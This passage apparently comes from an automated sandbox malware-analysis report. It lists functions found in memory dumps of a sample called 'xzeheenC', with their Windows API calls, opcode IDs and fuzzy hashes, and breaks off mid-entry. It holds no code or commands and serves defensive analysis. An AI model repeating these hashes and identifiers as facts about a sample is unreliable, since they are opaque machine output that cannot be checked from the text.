                                                                                                                        Function 1CF0F368 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 1CF0F40C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3467653762.000000001CF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1cf00000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 61c35788ea6e87438e7fa33dff120d4cfe306a6d79c9e6182ff56b1dffe2e14b
                                                                                                                        • Instruction ID: fd9d8efd28b7126b3a41065622355e790628190bd99806e3a2750eb81f3b4e72
                                                                                                                        • Opcode Fuzzy Hash: 61c35788ea6e87438e7fa33dff120d4cfe306a6d79c9e6182ff56b1dffe2e14b
                                                                                                                        • Instruction Fuzzy Hash: 44319AB8D012489FCF10DFA9D980A9EFBB1FF49310F10942AE819B7210D735A945CF64
                                                                                                                        Function 20CA77D0 Relevance: 1.6, APIs: 1, Instructions: 88timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(00000000,?,?,00000000), ref: 20CAE0CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        • Opcode ID: a7d66a7de586164f4a1a7993abf25f3e59a7a09ea369604b1a86b5986f518902
                                                                                                                        • Instruction ID: 2e820aa739b2cd8225c60cec2a8bba67c3e91036e2137543231f2ce8bdb2a861
                                                                                                                        • Opcode Fuzzy Hash: a7d66a7de586164f4a1a7993abf25f3e59a7a09ea369604b1a86b5986f518902
                                                                                                                        • Instruction Fuzzy Hash: C03188B8D042589FCB10CFA9D584A9EFBF5EB49310F24902AE918B7310D375A945CFA4
                                                                                                                        Function 20CAE028 Relevance: 1.6, APIs: 1, Instructions: 87timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(00000000,?,?,00000000), ref: 20CAE0CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        • Opcode ID: b5262ebf53e6b2d98742ec11a30dab1d62aa830bb4c7ba061d689fc5511e4892
                                                                                                                        • Instruction ID: 9e5641d4c2e7fba33bdf55c964136259ea4242fcb3d1156b260b3414c80c5b68
                                                                                                                        • Opcode Fuzzy Hash: b5262ebf53e6b2d98742ec11a30dab1d62aa830bb4c7ba061d689fc5511e4892
                                                                                                                        • Instruction Fuzzy Hash: F531A8B9D012589FCF10CFA9E580ADEFBF1AB49310F20901AE868B7350D375A945CFA4
                                                                                                                        Function 20CA7B3C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 20CA9582
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 29978b79de87179c122c57cc0a4b686b989ea68e5a27d93f0dde1db17ca7f5fd
                                                                                                                        • Instruction ID: 354e7d01f513f07931d0e2f938099ca6d96d296e1ac12f278321325b944d0ffd
                                                                                                                        • Opcode Fuzzy Hash: 29978b79de87179c122c57cc0a4b686b989ea68e5a27d93f0dde1db17ca7f5fd
                                                                                                                        • Instruction Fuzzy Hash: 283197B8D002499FCB14CFAAD585ADEFBF5EB49310F14906AE918B7320D774A941CFA4
                                                                                                                        Function 20CA94E9 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 20CA9582
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: dfc659408e951eee2734b4e2814bababcdef6d6149952d376505c6d8ea16d958
                                                                                                                        • Instruction ID: a75e87dbb8211db87d4de971677d3c3c90ca2ccf8352f59e87cef4cf31947233
                                                                                                                        • Opcode Fuzzy Hash: dfc659408e951eee2734b4e2814bababcdef6d6149952d376505c6d8ea16d958
                                                                                                                        • Instruction Fuzzy Hash: 223197B8D002599FCB14CFAAD585ADEFBF1AB49310F14906AE918B7360D334A945CFA4
                                                                                                                        Function 20D994CC Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 20D9B7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474721924.0000000020D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D90000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20d90000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatchMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2061451462-0
                                                                                                                        • Opcode ID: 2b25c3331b92a71d823f22a0c8e069977b4a0b2fb47b2df6158911035915ba86
                                                                                                                        • Instruction ID: fbcdc8e4ae82f121c20cc8e8c87c9c0c66e5987699cf388ddfaff2815768965f
                                                                                                                        • Opcode Fuzzy Hash: 2b25c3331b92a71d823f22a0c8e069977b4a0b2fb47b2df6158911035915ba86
                                                                                                                        • Instruction Fuzzy Hash: 8231CCB8D01208DFCB10CFA9D580ADEFBF4AB49320F24901AE908B3310D334A941CFA5
                                                                                                                        Function 20D9B761 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 20D9B7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474721924.0000000020D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D90000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20d90000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatchMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2061451462-0
                                                                                                                        • Opcode ID: 46bdd1dca3d2891a8318ab814a8a9fd2b8d040f1f7d9c69a826e995fb0ca7945
                                                                                                                        • Instruction ID: a97b6f1c50497f7cd475e6876c53dba8b5fbc998a07217e608441e081ac373a8
                                                                                                                        • Opcode Fuzzy Hash: 46bdd1dca3d2891a8318ab814a8a9fd2b8d040f1f7d9c69a826e995fb0ca7945
                                                                                                                        • Instruction Fuzzy Hash: C231B9B8D012589FCB14CFA9D580ADEFBF4AF49320F24906AE908B7310D335A941CFA5
                                                                                                                        Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 959018026-0
                                                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                        Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 10892065-0
                                                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                        Function 20A82370 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq
                                                                                                                        • API String ID: 0-725504367
                                                                                                                        • Opcode ID: 2145fe2d47abf974dc5abcbd595ad661ce325e8eddb1f5171e8599d042a529f8
                                                                                                                        • Instruction ID: 174f5914111e47d570c2a91252b35364d07cb1ae75f404c0980e6b59353fda7e
                                                                                                                        • Opcode Fuzzy Hash: 2145fe2d47abf974dc5abcbd595ad661ce325e8eddb1f5171e8599d042a529f8
                                                                                                                        • Instruction Fuzzy Hash: 3B310535B042489FCB08DBB9D950ABF7BAAAF85310F5040BDD909DB251DE35DD06C7A1
                                                                                                                        Function 20A824B0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq
                                                                                                                        • API String ID: 0-725504367
                                                                                                                        • Opcode ID: 592a1a5e850bbc34dd70baa892c791888e74b3670e6c63ea20092f37f5c3dfef
                                                                                                                        • Instruction ID: 0dac4bcfa97d1c3c6d6daaea50456344bd1467427236b0773a273b9c0fca536b
                                                                                                                        • Opcode Fuzzy Hash: 592a1a5e850bbc34dd70baa892c791888e74b3670e6c63ea20092f37f5c3dfef
                                                                                                                        • Instruction Fuzzy Hash: 0C210534B042499FD708DFAAD860BBE7B6AFF85310F60807DD8058B295DE359D46C751
                                                                                                                        Function 1CF0F638 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3467653762.000000001CF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1cf00000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: e279d658b732fe977a13a66ec1c35bbe5d6487c3d131e1c2702350c44554304d
                                                                                                                        • Instruction ID: 2feb34c0081487f262713a4576780b05e80dc88b1dc4f9efc515c65a3a5aed53
                                                                                                                        • Opcode Fuzzy Hash: e279d658b732fe977a13a66ec1c35bbe5d6487c3d131e1c2702350c44554304d
                                                                                                                        • Instruction Fuzzy Hash: BA31ACB4D012589FCB14DFA9D581A9EFBF5BF49310F10942AE819B7310C735A941CFA4
                                                                                                                        Function 20AA4EE8 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq
                                                                                                                        • API String ID: 0-725504367
                                                                                                                        • Opcode ID: a8fb043804ab1cb21fdc242a1d2955931938388fcdfdc7b68489035cdaf03397
                                                                                                                        • Instruction ID: ac88c28712e916646aae96b94ce882aefc00ff6f63ab028b6f64cebba194ac2b
                                                                                                                        • Opcode Fuzzy Hash: a8fb043804ab1cb21fdc242a1d2955931938388fcdfdc7b68489035cdaf03397
                                                                                                                        • Instruction Fuzzy Hash: 7D11BE30A042089FCB48DFB8955577E7AF6AB85200F6084B9D8099B285EE349E45C792
                                                                                                                        Function 20AA3808 Relevance: .2, Instructions: 219COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b0b964cbf109a4d4ff990797a534a701099d1fe9736f237a827d43fc90b2a8a3
                                                                                                                        • Instruction ID: c616d9c13d17fde3babebcc702d27df4dabd7fd42c00b571fa28344f78601677
                                                                                                                        • Opcode Fuzzy Hash: b0b964cbf109a4d4ff990797a534a701099d1fe9736f237a827d43fc90b2a8a3
                                                                                                                        • Instruction Fuzzy Hash: 8E7101367002218FC7099FB9C4D4A2EBBA6BFC9250B14806DE946CB395DF79DC02CB91
                                                                                                                        Function 20A82648 Relevance: .2, Instructions: 209COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84b19192ea4ba6f075bda20f6837b0ab88f3ce3aafb865ed4822a4cee32e2cc8
                                                                                                                        • Instruction ID: 8aaf11185d60f39c86ffdef3646fe3be6f5e68db719f3e231effb4862067aa85
                                                                                                                        • Opcode Fuzzy Hash: 84b19192ea4ba6f075bda20f6837b0ab88f3ce3aafb865ed4822a4cee32e2cc8
                                                                                                                        • Instruction Fuzzy Hash: 9051F376B002059FCB049AAED844AABBBE9FBC8320F60853EE959D7751D631DC0187A0
                                                                                                                        Function 20AA1D18 Relevance: .2, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 36ce2c19166d43209250b0149bd4fbae6b8ac127f9fe28f758e8d3dfe0004ed8
                                                                                                                        • Instruction ID: a159dd9c80a3c411dab1db1c2b59ca0d698f9823eee12dffe2cb329407d24b5e
                                                                                                                        • Opcode Fuzzy Hash: 36ce2c19166d43209250b0149bd4fbae6b8ac127f9fe28f758e8d3dfe0004ed8
                                                                                                                        • Instruction Fuzzy Hash: D091EE74E412299BDB64DF69D994BEDBBB2BF88300F1081E9D45DA7290DB306E80CF40
                                                                                                                        Function 20AA62A0 Relevance: .2, Instructions: 157COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d68f0d78ff215a3a15cfd499a6e67c5ba28a7878ae6c7c41daba4c9dadbc7583
                                                                                                                        • Instruction ID: df84944ffc9dcb3f9d35efbd969d439fe225c64e3051a14c046357a1050f2c9e
                                                                                                                        • Opcode Fuzzy Hash: d68f0d78ff215a3a15cfd499a6e67c5ba28a7878ae6c7c41daba4c9dadbc7583
                                                                                                                        • Instruction Fuzzy Hash: D371A374E412298FDB64DF69DD94BEDBBB2BF89300F1080EAD519A7291DB305E818F40
                                                                                                                        Function 20AA5470 Relevance: .2, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 767bf408d6488d943a82a9c671270b1b1beaeb91c9424059ff35acdf48709e8b
                                                                                                                        • Instruction ID: fd53b51c6f13a0da2517241ad28ed5f9ec6bbc539c2236068e1ff6dbd1442997
                                                                                                                        • Opcode Fuzzy Hash: 767bf408d6488d943a82a9c671270b1b1beaeb91c9424059ff35acdf48709e8b
                                                                                                                        • Instruction Fuzzy Hash: DD71A374E412299FDB64DF69DD90BEDB7B2BF89300F1080EAD919A7290DB315E818F44
                                                                                                                        Function 20AAC820 Relevance: .1, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9031d8a00012c4a4a38d5863a2d04000bedf5a4e673530d1c3ba82894d8b70cf
                                                                                                                        • Instruction ID: c3044f28620ca9855383d9e34f7a3d3a910edb794ee9bc4a00b781068ba41f19
                                                                                                                        • Opcode Fuzzy Hash: 9031d8a00012c4a4a38d5863a2d04000bedf5a4e673530d1c3ba82894d8b70cf
                                                                                                                        • Instruction Fuzzy Hash: A351BE76E01218DFDB04CFE9D594AEEBBF2BF48301F208129D41AA7295DB345A46CF54
                                                                                                                        Function 20AAC830 Relevance: .1, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ee7ebce11da49565bb5e50f222bb85c00a887f58b9fea0d4108397e66e573530
                                                                                                                        • Instruction ID: 163243bbad8e7d943bc55899031b753841b85f27834cf2f71e21461474bc7255
                                                                                                                        • Opcode Fuzzy Hash: ee7ebce11da49565bb5e50f222bb85c00a887f58b9fea0d4108397e66e573530
                                                                                                                        • Instruction Fuzzy Hash: 9451AE75E01218DFDB04CFE9D594AEEBBF2BF48300F208129D419A7295EB346A46CF54
                                                                                                                        Function 20A89C28 Relevance: .1, Instructions: 126COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1244b92c19da4a2e6997cba72ae798d8a0fb5e59d4ec9a73b85cc2b8090dccb2
                                                                                                                        • Instruction ID: 029c6de740641ea4931ea4f1e3b8928c599072f07bfc6f990b074a2602115335
                                                                                                                        • Opcode Fuzzy Hash: 1244b92c19da4a2e6997cba72ae798d8a0fb5e59d4ec9a73b85cc2b8090dccb2
                                                                                                                        • Instruction Fuzzy Hash: 7851F0B4D01218DFDB04CFEAD488ACDBBB2BF88310F64C129E414AB294D7759946CF54
                                                                                                                        Function 20A89DC6 Relevance: .1, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bfb71d391aa3f856b3987311b69c9e638eee8a275e5efc775e620ce66f73e4a7
                                                                                                                        • Instruction ID: edacdad08bb38e8e38bf20e2b73ef17b2f02309658799f348042eeb9f750c516
                                                                                                                        • Opcode Fuzzy Hash: bfb71d391aa3f856b3987311b69c9e638eee8a275e5efc775e620ce66f73e4a7
                                                                                                                        • Instruction Fuzzy Hash: 475112B4D05208CFCB14CFE9D488ACCBBB1BF49315F689129E419BB295D7399986CF14
                                                                                                                        Function 20AA0012 Relevance: .1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 492795666b0d58dd30652a7a4233c4f2062ae8cd7c00612f8d92c267126ad98a
                                                                                                                        • Instruction ID: 64ad535b9710eae932a939adba31493bb946768351d55b82f2eb6fa0478e77c3
                                                                                                                        • Opcode Fuzzy Hash: 492795666b0d58dd30652a7a4233c4f2062ae8cd7c00612f8d92c267126ad98a
                                                                                                                        • Instruction Fuzzy Hash: 8F411A75E05218CFDB25CFB9C8407DDBBF2AF8A300F5481AAC458A7252DB355A85CF51
                                                                                                                        Function 20AA3F10 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a542e855d21bdc0367a65360f744822ae9112ea8b553dd69d7bcba6749d6e825
                                                                                                                        • Instruction ID: cff883dad61367279c076cab04bbb0de94007ab4ffad11e9ce2744833ce656dc
                                                                                                                        • Opcode Fuzzy Hash: a542e855d21bdc0367a65360f744822ae9112ea8b553dd69d7bcba6749d6e825
                                                                                                                        • Instruction Fuzzy Hash: AF413B36758121CFCB88CB98E8E8D1A3FB4BBD66257914155F807CB2A1DB78DC40DBA0
                                                                                                                        Function 20AA8290 Relevance: .1, Instructions: 107COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcbce978f7dade223ac1841686f7da0ff818056e4a206a077b420f2d9abfc07a
                                                                                                                        • Instruction ID: 7e71a0ea96aa5d976cd67686ff8ba29c6c5c616f107592d211fb7b26f44d7433
                                                                                                                        • Opcode Fuzzy Hash: fcbce978f7dade223ac1841686f7da0ff818056e4a206a077b420f2d9abfc07a
                                                                                                                        • Instruction Fuzzy Hash: A141C575E01218CFDB68CFAAD9507DEBBF2AF89300F50C0A9C418A7252DB345A85CF55
                                                                                                                        Function 20AA99D9 Relevance: .1, Instructions: 107COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e57a8807f3e2117b8f5eb9f72c50e33aae13a5224f0cb0df0677559b8374aaf5
                                                                                                                        • Instruction ID: 38dff98702c91b82bc90e3be59d7780349caee0bdd04c6cc05d76bd5fa9215d2
                                                                                                                        • Opcode Fuzzy Hash: e57a8807f3e2117b8f5eb9f72c50e33aae13a5224f0cb0df0677559b8374aaf5
                                                                                                                        • Instruction Fuzzy Hash: FE41C275E01218CFDB64CFAAD95079EBBF2BF89300F50C0AAC458A7252DB345A85CF15
                                                                                                                        Function 20A8F878 Relevance: .1, Instructions: 105COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
